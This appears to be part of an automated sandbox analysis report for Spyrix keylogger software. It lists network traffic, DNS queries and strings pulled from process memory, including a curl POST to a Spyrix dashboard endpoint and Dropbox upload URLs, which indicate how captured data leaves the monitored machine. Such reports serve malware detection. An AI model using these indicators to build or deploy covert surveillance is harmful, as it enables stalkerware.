Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: qrl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_

Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)

Source: global traffic	DNS traffic detected: DNS query: filedn.com
Source: global traffic	DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic	DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic	DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic	DNS traffic detected: DNS query: spyrix.net
Source: global traffic	DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 426Content-Type: application/x-www-form-urlencoded

Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: spkl.exe, 00000038.00000002.2742570837.000000000456C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.jpg
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000008.00000002.2689351113.0000027405600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.com
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000038.00000003.2422306843.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 0000004D.00000000.2590049471.00000000005EA000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://neftali.clubdelphi.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.certum.pl0.
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr	String found in binary or memory: http://schemas.mic
Source: is-VPREH.tmp.22.dr	String found in binary or memory: http://schemas.micr
Source: is-NOU64.tmp.22.dr	String found in binary or memory: http://schemas.microsof
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe	String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe	String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.0000000001FB8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dk-soft.org/
Source: spkl.exe, spkl.exe, 00000038.00000002.2673755823.0000000000863000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spmm.exe, 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, spmm.exe, 0000004D.00000002.2678280868.00000000022B1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe	String found in binary or memory: http://www.indyproject.org/Original
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jrsoftware.org/0
Source: [space]= .exe, 00000013.00000000.1870033970.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2457362812.0000000003432000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe	String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000038.00000002.2691175840.00000000009EA000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.0000000004591000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, is-SDGI4.tmp.22.dr, is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr	String found in binary or memory: http://www.spyrix.com/purchase.php
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2454626435.0000000000775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.spyrix.net/ibann
Source: spmm.exe, 0000004D.00000002.2690989523.0000000061E9E000.00000008.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token
Source: spkl.exe	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://api.dropbox.com/1/shares/sandbox
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
